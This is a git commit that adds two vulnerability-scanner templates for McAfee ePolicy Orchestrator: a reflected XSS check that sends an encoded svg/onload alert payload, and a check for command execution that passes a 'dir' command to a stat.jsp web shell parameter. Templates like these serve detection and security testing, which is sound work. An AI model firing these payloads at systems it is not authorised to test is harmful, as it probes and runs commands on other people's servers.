Merge pull request #669 from dwisiswant0/add/vuln-cve-2020-7318

Add McAfee ePO CVE & Vuln
2020-12-09 18:45:49 +05:30 · 2020-12-09 18:45:49 +05:30 · f83258f4a4
parent a6b1b2854b d383687b6a
commit f83258f4a4
2 changed files with 75 additions and 0 deletions
--- a/cves/CVE-2020-7318.yaml
+++ b/cves/CVE-2020-7318.yaml
@ -0,0 +1,41 @@
+id: cve-2020-7318
+
+info:
+  name: McAfee ePolicy Orchestrator Reflected XSS
+  author: dwisiswant0
+  severity: medium
+  description: |
+    Cross-Site Scripting vulnerability in McAfee ePolicy Orchestrator (ePO)
+    prior to 5.10.9 Update 9 allows administrators to inject arbitrary web
+    script or HTML via multiple parameters where the administrator's entries
+    were not correctly sanitized.
+
+    References:
+    - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/
+
+requests:
+  - payloads:
+      port:
+        - "80"
+        - "443"
+        - "8443"
+    raw:
+      - |
+        GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1
+        Host: {{Hostname}}:§port§
+        Connection: close
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "text/html"
+        part: header
+      - type: word
+        words:
+          - "Policy Name"
+          - "'\"><svg/onload=alert(document.domain)>"
+        condition: and
+        part: body
--- a/vulnerabilities/mcafee-epo-rce.yaml
+++ b/vulnerabilities/mcafee-epo-rce.yaml
@ -0,0 +1,34 @@
+id: mcafee-epo-rce
+
+info:
+  name: McAfee ePolicy Orchestrator RCE
+  author: dwisiswant0
+  severity: high
+  description: |
+    A ZipSlip vulnerability in McAfee ePolicy Orchestrator (ePO)
+    is a type of Path Traversal occurring when archives are unpacked
+    if the names of the packed files are not properly sanitized.
+    An attacker can create archives with files containing “../” in their names,
+    making it possible to upload arbitrary files
+    to arbitrary directories or overwrite existing ones during archive extraction.
+
+    References:
+    - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/stat.jsp?cmd=chcp+437+%7c+dir"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "text/html"
+        part: header
+      - type: regex
+        regex:
+          - "Volume (in drive [A-Z]|Serial Number) is"
+        part: body